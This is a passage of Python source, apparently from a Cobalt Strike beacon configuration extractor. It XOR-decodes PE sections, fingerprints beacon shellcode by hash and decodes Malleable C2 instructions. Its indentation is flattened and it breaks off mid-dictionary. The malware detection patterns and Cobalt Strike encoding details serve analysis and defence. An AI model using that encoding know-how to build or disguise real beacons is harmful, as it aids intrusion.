if not 'fields' in object:
print('Error JSON dictionary has no fields')
return None
if not 'name' in object['fields']:
print('Error JSON dictionary has no name field')
return None
if not 'content' in object['fields']:
print('Error JSON dictionary has no content field')
return None
if not 'items' in object:
print('Error JSON dictionary has no items')
return None
for item in object['items']:
item['content'] = binascii.a2b_base64(item['content'])
return object['items']
CUTTERM_NOTHING = 0
CUTTERM_POSITION = 1
CUTTERM_FIND = 2
CUTTERM_LENGTH = 3
def Replace(string, dReplacements):
if string in dReplacements:
return dReplacements[string]
else:
return string
def ParseInteger(argument):
sign = 1
if argument.startswith('+'):
argument = argument[1:]
elif argument.startswith('-'):
argument = argument[1:]
sign = -1
if argument.startswith('0x'):
return sign * int(argument[2:], 16)
else:
return sign * int(argument)
def ParseCutTerm(argument):
if argument == '':
return CUTTERM_NOTHING, None, ''
oMatch = re.match(r'\-?0x([0-9a-f]+)', argument, re.I)
if oMatch == None:
oMatch = re.match(r'\-?(\d+)', argument)
else:
value = int(oMatch.group(1), 16)
if argument.startswith('-'):
value = -value
return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
if oMatch == None:
oMatch = re.match(r'\[([0-9a-f]+)\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?', argument, re.I)
else:
value = int(oMatch.group(1))
if argument.startswith('-'):
value = -value
return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
if oMatch == None:
oMatch = re.match(r"\[u?\'(.+?)\'\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?", argument)
else:
if len(oMatch.group(1)) % 2 == 1:
raise Exception("Uneven length hexadecimal string")
else:
return CUTTERM_FIND, (binascii.a2b_hex(oMatch.group(1)), int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
if oMatch == None:
return None, None, argument
else:
if argument.startswith("[u'"):
# convert ascii to unicode 16 byte sequence
searchtext = oMatch.group(1).decode('unicode_escape').encode('utf16')[2:]
else:
searchtext = oMatch.group(1)
return CUTTERM_FIND, (searchtext, int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
def ParseCutArgument(argument):
type, value, remainder = ParseCutTerm(argument.strip())
if type == CUTTERM_NOTHING:
return CUTTERM_NOTHING, None, CUTTERM_NOTHING, None
elif type == None:
if remainder.startswith(':'):
typeLeft = CUTTERM_NOTHING
valueLeft = None
remainder = remainder[1:]
else:
return None, None, None, None
else:
typeLeft = type
valueLeft = value
if typeLeft == CUTTERM_POSITION and valueLeft < 0:
return None, None, None, None
if typeLeft == CUTTERM_FIND and valueLeft[1] == 0:
return None, None, None, None
if remainder.startswith(':'):
remainder = remainder[1:]
else:
return None, None, None, None
type, value, remainder = ParseCutTerm(remainder)
if type == CUTTERM_POSITION and remainder == 'l':
return typeLeft, valueLeft, CUTTERM_LENGTH, value
elif type == None or remainder != '':
return None, None, None, None
elif type == CUTTERM_FIND and value[1] == 0:
return None, None, None, None
else:
return typeLeft, valueLeft, type, value
def Find(data, value, nth, startposition=-1):
position = startposition
while nth > 0:
position = data.find(value, position + 1)
if position == -1:
return -1
nth -= 1
return position
def CutData(stream, cutArgument):
if cutArgument == '':
return [stream, None, None]
typeLeft, valueLeft, typeRight, valueRight = ParseCutArgument(cutArgument)
if typeLeft == None:
return [stream, None, None]
if typeLeft == CUTTERM_NOTHING:
positionBegin = 0
elif typeLeft == CUTTERM_POSITION:
positionBegin = valueLeft
elif typeLeft == CUTTERM_FIND:
positionBegin = Find(stream, valueLeft[0], valueLeft[1])
if positionBegin == -1:
return ['', None, None]
positionBegin += valueLeft[2]
else:
raise Exception("Unknown value typeLeft")
if typeRight == CUTTERM_NOTHING:
positionEnd = len(stream)
elif typeRight == CUTTERM_POSITION and valueRight < 0:
positionEnd = len(stream) + valueRight
elif typeRight == CUTTERM_POSITION:
positionEnd = valueRight + 1
elif typeRight == CUTTERM_LENGTH:
positionEnd = positionBegin + valueRight
elif typeRight == CUTTERM_FIND:
positionEnd = Find(stream, valueRight[0], valueRight[1], positionBegin)
if positionEnd == -1:
return ['', None, None]
else:
positionEnd += len(valueRight[0])
positionEnd += valueRight[2]
else:
raise Exception("Unknown value typeRight")
return [stream[positionBegin:positionEnd], positionBegin, positionEnd]
#-BEGINCODE cDump------------------------------------------------------------------------------------
#import binascii
#import sys
#if sys.version_info[0] >= 3:
# from io import StringIO
#else:
# from cStringIO import StringIO
class cDump():
def __init__(self, data, prefix='', offset=0, dumplinelength=16):
self.data = data
self.prefix = prefix
self.offset = offset
self.dumplinelength = dumplinelength
def HexDump(self):
oDumpStream = self.cDumpStream(self.prefix)
hexDump = ''
for i, b in enumerate(self.data):
if i % self.dumplinelength == 0 and hexDump != '':
oDumpStream.Addline(hexDump)
hexDump = ''
hexDump += IFF(hexDump == '', '', ' ') + '%02X' % self.C2IIP2(b)
oDumpStream.Addline(hexDump)
return oDumpStream.Content()
def CombineHexAscii(self, hexDump, asciiDump):
if hexDump == '':
return ''
countSpaces = 3 * (self.dumplinelength - len(asciiDump))
if len(asciiDump) <= self.dumplinelength / 2:
countSpaces += 1
return hexDump + ' ' + (' ' * countSpaces) + asciiDump
def HexAsciiDump(self, rle=False):
oDumpStream = self.cDumpStream(self.prefix)
position = ''
hexDump = ''
asciiDump = ''
previousLine = None
countRLE = 0
for i, b in enumerate(self.data):
b = self.C2IIP2(b)
if i % self.dumplinelength == 0:
if hexDump != '':
line = self.CombineHexAscii(hexDump, asciiDump)
if not rle or line != previousLine:
if countRLE > 0:
oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
oDumpStream.Addline(position + line)
countRLE = 0
else:
countRLE += 1
previousLine = line
position = '%08X:' % (i + self.offset)
hexDump = ''
asciiDump = ''
if i % self.dumplinelength == self.dumplinelength / 2:
hexDump += ' '
hexDump += ' %02X' % b
asciiDump += IFF(b >= 32 and b < 128, chr(b), '.')
if countRLE > 0:
oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
oDumpStream.Addline(self.CombineHexAscii(position + hexDump, asciiDump))
return oDumpStream.Content()
def Base64Dump(self, nowhitespace=False):
encoded = binascii.b2a_base64(self.data)
if nowhitespace:
return encoded
encoded = encoded.strip()
oDumpStream = self.cDumpStream(self.prefix)
length = 64
for i in range(0, len(encoded), length):
oDumpStream.Addline(encoded[0+i:length+i])
return oDumpStream.Content()
class cDumpStream():
def __init__(self, prefix=''):
self.oStringIO = StringIO()
self.prefix = prefix
def Addline(self, line):
if line != '':
self.oStringIO.write(self.prefix + line + '\n')
def Content(self):
return self.oStringIO.getvalue()
@staticmethod
def C2IIP2(data):
if sys.version_info[0] > 2:
return data
else:
return ord(data)
#-ENDCODE cDump--------------------------------------------------------------------------------------
def IfWIN32SetBinary(io):
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(io.fileno(), os.O_BINARY)
#Fix for http://bugs.python.org/issue11395
def StdoutWriteChunked(data):
if sys.version_info[0] > 2:
sys.stdout.buffer.write(data)
else:
while data != '':
sys.stdout.write(data[0:10000])
try:
sys.stdout.flush()
except IOError:
return
data = data[10000:]
class cVariables():
def __init__(self, variablesstring='', separator=DEFAULT_SEPARATOR):
self.dVariables = {}
if variablesstring == '':
return
for variable in variablesstring.split(separator):
name, value = VariableNameValue(variable)
self.dVariables[name] = value
def SetVariable(self, name, value):
self.dVariables[name] = value
def Instantiate(self, astring):
for key, value in self.dVariables.items():
astring = astring.replace('%' + key + '%', value)
return astring
class cOutput():
def __init__(self, filenameOption=None):
self.starttime = time.time()
self.filenameOption = filenameOption
self.separateFiles = False
self.progress = False
self.console = False
self.head = False
self.headCounter = 0
self.tail = False
self.tailQueue = []
self.fOut = None
self.rootFilenames = {}
if self.filenameOption:
if self.ParseHash(self.filenameOption):
if not self.separateFiles and self.filename != '':
self.fOut = open(self.filename, 'w')
elif self.filenameOption != '':
self.fOut = open(self.filenameOption, 'w')
self.dReplacements = {}
def Replace(self, line):
for key, value in self.dReplacements.items():
line = line.replace(key, value)
return line
def ParseHash(self, option):
if option.startswith('#'):
position = self.filenameOption.find('#', 1)
if position > 1:
switches = self.filenameOption[1:position]
self.filename = self.filenameOption[position + 1:]
for switch in switches:
if switch == 's':
self.separateFiles = True
elif switch == 'p':
self.progress = True
elif switch == 'c':
self.console = True
elif switch == 'l':
pass
elif switch == 'g':
if self.filename != '':
extra = self.filename + '-'
else:
extra = ''
self.filename = '%s-%s%s.txt' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], extra, self.FormatTime())
elif switch == 'h':
self.head = True
elif switch == 't':
self.tail = True
else:
return False
return True
return False
@staticmethod
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def RootUnique(self, root):
if not root in self.rootFilenames:
self.rootFilenames[root] = None
return root
iter = 1
while True:
newroot = '%s_%04d' % (root, iter)
if not newroot in self.rootFilenames:
self.rootFilenames[newroot] = None
return newroot
iter += 1
def LineSub(self, line, eol):
line = self.Replace(line)
if self.fOut == None or self.console:
try:
print(line, end=eol)
except UnicodeEncodeError:
encoding = sys.stdout.encoding
print(line.encode(encoding, errors='backslashreplace').decode(encoding), end=eol)
# sys.stdout.flush()
if self.fOut != None:
self.fOut.write(line + '\n')
self.fOut.flush()
def Line(self, line, eol='\n'):
if self.head:
if self.headCounter < 10:
self.LineSub(line, eol)
elif self.tail:
self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
self.headCounter += 1
elif self.tail:
self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
else:
self.LineSub(line, eol)
def LineTimestamped(self, line):
self.Line('%s: %s' % (self.FormatTime(), line))
def Filename(self, filename, index, total):
self.separateFilename = filename
if self.progress:
if index == 0:
eta = ''
else:
seconds = int(float((time.time() - self.starttime) / float(index)) * float(total - index))
eta = 'estimation %d seconds left, finished %s ' % (seconds, self.FormatTime(time.time() + seconds))
PrintError('%d/%d %s%s' % (index + 1, total, eta, self.separateFilename))
if self.separateFiles and self.filename != '':
oFilenameVariables = cVariables()
oFilenameVariables.SetVariable('f', self.separateFilename)
basename = os.path.basename(self.separateFilename)
oFilenameVariables.SetVariable('b', basename)
oFilenameVariables.SetVariable('d', os.path.dirname(self.separateFilename))
root, extension = os.path.splitext(basename)
oFilenameVariables.SetVariable('r', root)
oFilenameVariables.SetVariable('ru', self.RootUnique(root))
oFilenameVariables.SetVariable('e', extension)
self.Close()
self.fOut = open(oFilenameVariables.Instantiate(self.filename), 'w')
def Close(self):
if self.head and self.tail and len(self.tailQueue) > 0:
self.LineSub('...', '\n')
for line, eol in self.tailQueue:
self.LineSub(line, eol)
self.headCounter = 0
self.tailQueue = []
if self.fOut != None:
self.fOut.close()
self.fOut = None
def ToString(value):
if isinstance(value, str):
return value
else:
return str(value)
def Quote(value, separator, quote):
value = ToString(value)
if len(value) > 1 and value[0] == quote and value[-1] == quote:
return value
if separator in value or value == '':
return quote + value + quote
else:
return value
def MakeCSVLine(row, separator=',', quote='"'):
return separator.join([Quote(value, separator, quote) for value in row])
class cLogfile():
def __init__(self, keyword, comment):
self.starttime = time.time()
self.errors = 0
if keyword == '':
self.oOutput = None
else:
self.oOutput = cOutput('%s-%s-%s.log' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], keyword, self.FormatTime()))
self.Line('Start')
self.Line('UTC', '%04d%02d%02d-%02d%02d%02d' % time.gmtime(time.time())[0:6])
self.Line('Comment', comment)
self.Line('Args', repr(sys.argv))
self.Line('Version', __version__)
self.Line('Python', repr(sys.version_info))
self.Line('Platform', sys.platform)
self.Line('CWD', repr(os.getcwd()))
@staticmethod
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def Line(self, *line):
if self.oOutput != None:
self.oOutput.Line(MakeCSVLine((self.FormatTime(), ) + line, DEFAULT_SEPARATOR, QUOTE))
def LineError(self, *line):
self.Line('Error', *line)
self.errors += 1
def Close(self):
if self.oOutput != None:
self.Line('Finish', '%d error(s)' % self.errors, '%d second(s)' % (time.time() - self.starttime))
self.oOutput.Close()
def CalculateByteStatistics(dPrevalence=None, data=None):
averageConsecutiveByteDifference = None
if dPrevalence == None:
dPrevalence = {iter: 0 for iter in range(0x100)}
sumDifferences = 0.0
previous = None
if len(data) > 1:
for byte in data:
byte = C2IIP2(byte)
dPrevalence[byte] += 1
if previous != None:
sumDifferences += abs(byte - previous)
previous = byte
averageConsecutiveByteDifference = sumDifferences /float(len(data)-1)
sumValues = sum(dPrevalence.values())
countNullByte = dPrevalence[0]
countControlBytes = 0
countWhitespaceBytes = 0
countUniqueBytes = 0
for iter in range(1, 0x21):
if chr(iter) in string.whitespace:
countWhitespaceBytes += dPrevalence[iter]
else:
countControlBytes += dPrevalence[iter]
countControlBytes += dPrevalence[0x7F]
countPrintableBytes = 0
for iter in range(0x21, 0x7F):
countPrintableBytes += dPrevalence[iter]
countHighBytes = 0
for iter in range(0x80, 0x100):
countHighBytes += dPrevalence[iter]
countHexadecimalBytes = 0
countBASE64Bytes = 0
for iter in range(0x30, 0x3A):
countHexadecimalBytes += dPrevalence[iter]
countBASE64Bytes += dPrevalence[iter]
for iter in range(0x41, 0x47):
countHexadecimalBytes += dPrevalence[iter]
for iter in range(0x61, 0x67):
countHexadecimalBytes += dPrevalence[iter]
for iter in range(0x41, 0x5B):
countBASE64Bytes += dPrevalence[iter]
for iter in range(0x61, 0x7B):
countBASE64Bytes += dPrevalence[iter]
countBASE64Bytes += dPrevalence[ord('+')] + dPrevalence[ord('/')] + dPrevalence[ord('=')]
entropy = 0.0
for iter in range(0x100):
if dPrevalence[iter] > 0:
prevalence = float(dPrevalence[iter]) / float(sumValues)
entropy += - prevalence * math.log(prevalence, 2)
countUniqueBytes += 1
return sumValues, entropy, countUniqueBytes, countNullByte, countControlBytes, countWhitespaceBytes, countPrintableBytes, countHighBytes, countHexadecimalBytes, countBASE64Bytes, averageConsecutiveByteDifference
def GetChunk(position, data):
return [data[:position], data[position:]]
def InstantiateCOutput(options):
filenameOption = None
if options.output != '':
filenameOption = options.output
return cOutput(filenameOption)
class UnpackErrorNotEnoughData(Exception):
pass
def Unpack(format, data):
size = struct.calcsize(format)
if len(data) < size:
raise UnpackErrorNotEnoughData()
result = list(struct.unpack(format, data[:size]))
result.append(data[size:])
return result
def Represent(data):
if sum([ord(c) for c in data]) == 0:
return '(NULL ...)'
else:
return repr(data.rstrip('\x00'))
def PrefixIfNeeded(string, prefix=' '):
if string == '':
return string
else:
return prefix + string
def Xor(data, key):
data = C2SIP3(data)
key = C2SIP3(key)
return C2BIP3(''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data))))
def FindAll(data, sub):
result = []
start = 0
while True:
position = data.find(sub, start)
if position == -1:
return result
result.append(position)
start = position + 1
def FindAllList(data, searches):
result = []
for element in searches:
result.extend(FindAll(data, element))
return sorted(list(set(result)))
def DecodeSectionnameIfNeeded(name):
if len(name) == 0 or name.startswith('.'):
return name
xorkey = ord(name[0]) ^ ord('.')
newname = ''.join([chr(ord(c) ^ xorkey) for c in name]).rstrip('\x00')
return newname
def GetDataSection(data):
sectionnames = []
try:
oPE = pefile.PE(data=data)
except Exception as e:
return e.value, None
for section in oPE.sections:
if sys.version_info[0] >= 3:
sectionname = ''.join(filter(lambda c:c != '\0', str(section.Name.decode('unicode_escape'))))
else:
sectionname = ''.join(filter(lambda c:c != '\0', section.Name))
sectionnames.append(repr(sectionname))
if DecodeSectionnameIfNeeded(sectionname) == '.data':
return None, section.get_data()
return '.data section not found: ' + ' '.join(sectionnames), None
def GetXorChainSection(data):
try:
oPE = pefile.PE(data=data)
except Exception as e:
return None, e.value
for section in oPE.sections:
extracted, messages = TryXORChainDecoding(section.get_data())
if messages != []:
return extracted, messages
return None, None
def StatisticalSearch(payloadsectiondata, key):
start = None
end = None
position = 0
while len(payloadsectiondata) > 8:
block, payloadsectiondata = GetChunk(8, payloadsectiondata)
if sum([IFF(c == key, 1, 0) for c in block]) > 2:
if start == None:
start = position
end = position + 7
else:
end = position + 7
position += 8
return start, end
def Bytes2IPv4(data):
return '%d.%d.%d.%d' % (P23Ord(data[0]), P23Ord(data[1]), P23Ord(data[2]), P23Ord(data[3]))
def FindAF_INET_PORT(operand):
if P23Ord(operand[0]) != 2:
return ''
if P23Ord(operand[1]) != 0:
return ''
return '%d' % struct.unpack('>H', operand[2:4])[0]
def IdentifyShellcode(shellcode):
if hashlib.sha256(shellcode[:346]).hexdigest() == '946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c':
return 'CS psexec psh x86 shellcode, opens named pipe'
elif hashlib.sha256(shellcode[:191]).hexdigest() == '02fd615831f5cc22d83ad681d33159d232afc3b18b69f647f1726280e2d7e3f3':
return 'CS reverse http x86 shellcode'
elif hashlib.sha256(shellcode[:271]).hexdigest() == 'bf413ba9b63b6777c4765581bf42c1fdb119f1ed22836cfaa80e616e2a3bf795':
return 'CS reverse http x64 shellcode'
elif hashlib.sha256(shellcode[:196]).hexdigest() == '52230666746fa8c9ec635083b05943d02bfe516fc45ea9c87eef300b9cd064e8':
return 'CS reverse https x86 shellcode'
elif hashlib.sha256(shellcode[:274]).hexdigest() == 'acffe4f9fd8f82044772627a4174f14abf873a8e783c31353bf094118f3c1706':
return 'CS reverse https x64 shellcode'
elif hashlib.sha256(shellcode[:330]).hexdigest() == 'a82872e2d839cd2ee1b0c2324b83f2686284ebe3eef5e9fb0c9e97db8d86cbf4':
return 'CS DNS x86 shellcode'
return ''
def AnalyzeShellcode(shellcode, oOutput):
dInstructions = {b'\x68': 'push', b'\xB8': 'mov eax'}
dJSONData = GetJSONData()
dLookupValues = dJSONData.get('dLookupValues', {})
identification = IdentifyShellcode(shellcode)
if identification != '':
oOutput.Line('Identification: %s' % identification)
position = shellcode.rfind(b'\xFF\xFF')
if position != -1:
parameters = shellcode[position+2:]
position00 = parameters.find(b'\x00')
remainder = b''
if position00 != -1:
remainder = parameters[position00 + 1:]
parameters = parameters[:position00]
oOutput.Line('Parameter: %d %s' % (position, repr(parameters)))
if len(remainder) == 4:
licenseid = struct.unpack('>I',remainder)[0]
info = 'license-id: %d %d' % (position + position00 + 1, licenseid)
info += LookupValue("37", '%d' % licenseid, dLookupValues)
oOutput.Line(info)
for pushPosition in FindAllList(shellcode, dInstructions.keys()):
if pushPosition + 5 <= len(shellcode):
if position == -1:
operand = shellcode[pushPosition + 1:pushPosition + 5]
oOutput.Line('%-10s: %5d %10d %5s %-16s %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<I', operand)[0], FindAF_INET_PORT(operand), Bytes2IPv4(operand), repr(shellcode[pushPosition:pushPosition + 5])))
elif shellcode[pushPosition + 3:pushPosition + 5] == b'\x00\x00':
oOutput.Line('%-10s: %5d %10d %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<H', shellcode[pushPosition + 1:pushPosition + 3])[0], repr(shellcode[pushPosition:pushPosition + 5])))
for str in ExtractStringsASCII(shellcode):
if len(str) == 5 and str.startswith(b'/') or str.startswith(b'User-Agent: ') or str.startswith(b'Mozilla/'):
positions = FindAll(shellcode, str)
oOutput.Line('String: %s %s' % (','.join(['%d' % position for position in positions]),str))
REGEX_STANDARD = b'[\x09\x20-\x7E]'
def ExtractStringsASCII(data):
regex = REGEX_STANDARD + b'{%d,}'
return re.findall(regex % 1, data)
def LookupConfigValue(id, value):
dConfigValues = {
0x0001: {
0: 'windows-beacon_http-reverse_http',
1: 'windows-beacon_dns-reverse_http',
2: 'windows-beacon_smb-bind_pipz',
4: 'windows-beacon_tcp-reverse_tcp',
8: 'windows-beacon_https-reverse_https',
16: 'windows-beacon_tcp-bind_tcp',
32: 'to be determined',
},
0x0023: {
1: 'no proxy',
2: 'IE settings',
4: 'hardcoded proxy',
},
0x002b: {
0x01: 'PAGE_NOACCESS',
0x02: 'PAGE_READONLY',
0x04: 'PAGE_READWRITE',
0x08: 'PAGE_WRITECOPY',
0x10: 'PAGE_EXECUTE',
0x20: 'PAGE_EXECUTE_READ',
0x40: 'PAGE_EXECUTE_READWRITE',
0x80: 'PAGE_EXECUTE_WRITECOPY',
},
}
return PrefixIfNeeded(dConfigValues[id].get(value, ''))
def ConvertIntToIPv4(value):
return ' %d.%d.%d.%d' % (C2IIP2(value[0]), C2IIP2(value[1]), C2IIP2(value[2]), C2IIP2(value[3]))
def ToHexadecimal(value):
if isinstance(value, int):
return '%x' % value
else:
return binascii.b2a_hex(value).decode()
def LookupValue(number, value, dInfo, verbose=False):
lookup = ''
if number in dInfo:
lookup = dInfo[number].get(value, '')
if isinstance(lookup, dict):
message = lookup['normal']
if verbose:
message += ' (%s)' % lookup['verbose']
lookup = message
return PrefixIfNeeded(lookup)
def InterpretValue(info, number, value, dConfigValueInterpreter):
interpreted = ''
if number in dConfigValueInterpreter:
interpreted = dConfigValueInterpreter[number](value)
return info + interpreted
def GetScriptPath():
if getattr(sys, 'frozen', False):
return os.path.dirname(sys.executable)
else:
return os.path.dirname(sys.argv[0])
def DetermineCSVersionFromConfig(dJSON):
maximumID = max(map(int, dJSON.keys()))
if maximumID < 55:
return ('3', maximumID)
elif maximumID == 55:
return ('4.0', maximumID)
elif maximumID > 55 and maximumID < 58:
return ('4.1', maximumID)
elif maximumID == 58:
return ('4.2', maximumID)
elif maximumID == 70:
return ('4.3', maximumID)
else:
return ('4.4', maximumID)
def SanityCheckExtractedConfig(dJSON):
if not 1 in dJSON:
return False
if not 7 in dJSON:
return False
if LookupConfigValue(1, dJSON[1]['rawvalue']) == '':
return False
if not isinstance(dJSON[7]['rawvalue'], str):
return False
if not dJSON[7]['rawvalue'].startswith('308'):
return False
return True
def GetJSONData():
filename = os.path.join(GetScriptPath(), '1768b.json')
if os.path.isfile(filename):
return json.load(open(filename, 'r'))
filename = os.path.join(GetScriptPath(), '1768.json')
if os.path.isfile(filename):
return json.load(open(filename, 'r'))
return {}
class cStruct(object):
def __init__(self, data):
self.data = data
self.originaldata = data
def Unpack(self, format):
formatsize = struct.calcsize(format)
if len(self.data) < formatsize:
raise Exception('Not enough data')
tounpack = self.data[:formatsize]
self.data = self.data[formatsize:]
result = struct.unpack(format, tounpack)
if len(result) == 1:
return result[0]
else:
return result
def Truncate(self, length):
self.data = self.data[:length]
def GetBytes(self, length=None):
if length == None:
length = len(self.data)
result = self.data[:length]
self.data = self.data[length:]
return result
def GetString(self, format):
stringLength = self.Unpack(format)
return self.GetBytes(stringLength)
def Length(self):
return len(self.data)
# https://www.usualsuspect.re/article/cobalt-strikes-malleable-c2-under-the-hood
INSTRUCTION_TYPE_MALLEABLE_C2 = 1
INSTRUCTION_TYPE_GET = 2
INSTRUCTION_TYPE_POST = 3
INSTRUCTION_NONE = 0
INSTRUCTION_APPEND = 1
INSTRUCTION_PREPEND = 2
INSTRUCTION_BASE64 = 3
INSTRUCTION_PRINT = 4
INSTRUCTION_PARAMETER = 5
INSTRUCTION_HEADER = 6
INSTRUCTION_BUILD = 7
INSTRUCTION_NETBIOS = 8
INSTRUCTION_CONST_PARAMETER = 9
INSTRUCTION_CONST_HEADER = 10
INSTRUCTION_NETBIOSU = 11
INSTRUCTION_URI_APPEND = 12
INSTRUCTION_BASE64URL = 13
INSTRUCTION_STRREP = 14
INSTRUCTION_MASK = 15
INSTRUCTION_CONST_HOST_HEADER = 16
def DecodeInstructions(value, instructionsType):
oStruct = cStruct(value)
instructions = []
opcodes = []
buildFlag = False
while oStruct.Length() >= 4:
opcode = oStruct.Unpack('>I')
if buildFlag and opcode in [0, 6, 7, 10, 16]:
instructions.append('Build End')
opcodes.append(['7', 'End'])
buildFlag = False
if opcode == INSTRUCTION_NONE:
break
if opcode == INSTRUCTION_APPEND:
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
operand = oStruct.Unpack('>I')
instructions.append('Remove %d bytes from end' % operand)
opcodes.append([str(opcode), str(operand)])
else:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Append %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_PREPEND:
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
operand = oStruct.Unpack('>I')
instructions.append('Remove %d bytes from begin' % operand)
opcodes.append([str(opcode), str(operand)])
else:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Prepend %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_BASE64:
instructions.append('BASE64')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_PRINT:
instructions.append('Print')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_PARAMETER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Parameter %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Header %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_BUILD:
buildFlag = True
operand = oStruct.Unpack('>I')
if instructionsType == INSTRUCTION_TYPE_POST:
if operand == 0:
operand = 'SessionId'
else:
operand = 'Output'
else:
operand = 'Metadata'
instructions.append('Build %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_NETBIOS:
instructions.append('NETBIOS lowercase')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_CONST_PARAMETER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_parameter %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_CONST_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_header %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_NETBIOSU:
instructions.append('NETBIOS uppercase')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_URI_APPEND:
instructions.append('Uri_append')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_BASE64URL:
instructions.append('BASE64 URL')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_STRREP:
operand1 = oStruct.GetString('>I').decode('latin')
operand2 = oStruct.GetString('>I').decode('latin')
instructions.append('STRREP %s %s' % (operand1, operand2))
opcodes.append([str(opcode), operand1, operand2])
elif opcode == INSTRUCTION_MASK:
instructions.append('XOR with 4-byte random key')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_CONST_HOST_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_host_header %s' % operand)
opcodes.append([str(opcode), operand])
else:
instructions.append('Unknown instruction: 0x%02x' % opcode)
opcodes.append([str(opcode)])
result = []
buildFlag = False
for instruction in instructions:
if instruction == 'Build End':
result.append(build)
elif instruction.startswith('Build '):
build = [instruction]
buildFlag= True
elif buildFlag:
build.append(instruction)
else:
result.append(instruction)
instructions = result
result = []
buildFlag = False
for opcode in opcodes:
if opcode == ['7', 'End']:
result.append(build)
elif opcode[0] == '7':
build = [opcode]
buildFlag= True
elif buildFlag:
build.append(opcode)
else:
result.append(opcode)
opcodes = result
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
instructions = [['Transform Input'] + instructions]
opcodes = [[['7', 'Input']] + opcodes]
return [instructions, opcodes]
def DecodeMalleableC2Instructions(parameter):
instructions, opcodes = DecodeInstructions(parameter, INSTRUCTION_TYPE_MALLEABLE_C2)
buildOpcodes = ','.join([item for opcode in opcodes for item in opcode])
return 'Instructions: ' + ','.join(instructions) + ' [7,Input,' + buildOpcodes + ']'
def AnalyzeEmbeddedPEFileSub(payloadsectiondata, options):
result = []
if options.xorkeys:
for xorKey in range(256):
xorKeyBytes = bytes([xorKey])
startConfigXored = Xor(START_CONFIG, xorKeyBytes)
for position in FindAll(payloadsectiondata, startConfigXored):
result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(payloadsectiondata[position:position+0x10000], xorKeyBytes), result, options)
if result != [ERROR_SANITY_CHECK]:
return result, dJSON
return [result, {}]
xorKey = b'i'
config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
if len(config) == 0:
xorKey = b'.'
config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
if len(config) == 0:
xorKey = b'i'
startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
if startconfig == None:
xorKey = b'.'
startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
if startconfig == None:
result.append(ERROR_NO_CONFIG)
return [result, {}]
else:
result.append('Config found (statistical): xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
result.append(cDump(Xor(payloadsectiondata[startconfig:endconfig + 1], xorKey)).HexAsciiDump(rle=True))
return [result, {}]
# result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF')])))
# result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\x90\x01\x00\x00')])))
result.append('Config found: xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
data = config
return AnalyzeEmbeddedPEFileSub2(data, result, options)
def AnalyzeEmbeddedPEFileSub2(data, result, options):
dJSON = {}
dConfigIdentifiers = {
0x0001: 'payload type',
0x0002: 'port',
0x0003: 'sleeptime',
0x0004: 'maxgetsize', #
0x0005: 'jitter',
0x0006: 'maxdns',
0x0007: 'publickey',
0x0008: 'server,get-uri',
0x0009: 'useragent',
0x000a: 'post-uri',
